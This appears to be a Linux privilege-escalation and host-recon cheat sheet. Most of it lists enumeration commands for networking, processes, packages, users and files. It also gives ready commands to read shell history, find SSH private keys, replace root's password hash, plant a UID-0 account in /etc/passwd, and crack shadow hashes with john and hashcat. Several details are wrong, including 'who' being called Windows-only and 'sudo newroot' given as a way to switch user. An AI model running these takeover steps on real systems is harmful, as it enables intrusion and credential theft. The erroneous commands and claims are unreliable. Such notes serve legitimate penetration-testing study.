Host Recon

For automated enumeration of potential PE vectors see here.

Help

# List available commands
compgen -c | sort | less
compgen -a | sort | less

# Help for a specified command
man <command>
<command> --help

Networking

Network Info

General networking information, such as interfaces, IP addresses, and DNS:

ip addr show
ip a
ifconfig -a # deprecated

# Show interfaces
ip link show

ARP Table

Check recent communications via the ARP table:

ip route
ip neigh

Active Connections

List active TCP and UDP connections:

ss -tulnp
netstat -tulnp # deprecated

Routes

List recent and persistent routes:

ip route show
ip r
route -n # legacy

System

pspy can be used on the target to enumerate real-time system information!

General Info

# General system information
neofetch
hostnamectl
uname -a

# Name of the host
hostname

# Kernel version & distro info
uname -r
cat /etc/os-release

# Terminal history file
cat ~/.bash_history
cat ~/.zsh_history
history

# Environment variables
printenv
env

# Named pipes
ls -l /proc/sys/fs/pipe-max-size
lsof

# sudo version
sudo --version

Packages

# Installed packages

# Debian / Ubuntu (APT-based)
dpkg -l
apt list --installed

# RedHat / CentOS / Fedora (RPM-based)
rpm -qa
dnf list installed
yum list installed

# Arch Linux / Manjaro (Pacman)
pacman -Q

# Snap packages
snap list

# Flatpak packages
flatpak list

# Homebrew (macOS or Linux)
brew list --versions

Processes

# List running processes
ps aux

# Information about a specific process
ps -p <PID> -f
cat /proc/<PID>/status

Services

ps -eo pid,cmd
systemctl

Users & Groups

Users

# Current user
whoami

# List current user's privileges
sudo -l

# List current user's information
id
getent passwd $(whoami)

# List local users
cut -d: -f1 /etc/passwd
getent passwd

# List active (logged-on) users (works only on Windows Servers)
who

# Elevated permissions
sudo -l

Groups

# List current user's groups
groups
id -Gn

# List local groups
getent group

# List group members
getent group <group>

Files

General

# List all (including) hidden files
ls -la

# Include subdirectories
ls -laR

# Search for a specific file
find / -type f -name "local.txt" 2>/dev/null
locate local.txt

# Case-insensitive search
find / -type f -iname "local.txt" 2>/dev/null

SUIDs

find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null

Shadow

Check permissions:

ls -l /etc/shadow

If it is writable, create/modify a user:

# Generate a new password hash
openssl passwd -1 -salt xyz newpassword
# Replace root's password with the new one
echo 'root:$1$xyz$YOUR_GENERATED_HASH' | chpasswd -e
# Switch to root
su - root

If it is readable, copy shadow and passwd locally and crack them:

# Unshadow files
unshadow passwd shadow > hashes.txt
# Crack with john
john --wordlist=rockyou.txt hashes.txt
# Crack with hashcat
hashcat -m1800 hashes rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Passwd

Check the file's permissions:

ls -l /etc/passwd

If it is writable:

# Generate a new hash
openssl passwd -1 -salt evil password123
# Place the hash between the first and second ':' of root
sed -i 's/^root:[^:]*:/root:$1$evil$F9LZzU/LJjH7ZQZzJX.Zn1:/' /etc/passwd
# Or append root's info to the bottom, changing 'root' to a new user (e.g. 'newroot')
echo "newroot:\$1\$evil\$F9LZzU/LJjH7ZQZzJX.Zn1:0:0:root:/root:/bin/bash" >> /etc/passwd
# Switch user
sudo su
sudo newroot

SSH Keys

$ sudo find /home -name "id_rsa" -o -name "id_dsa"

Scheduled Jobs

# Print jobs
crontab -l
cat /etc/crontab
cat /var/log/syslog | grep "CRON"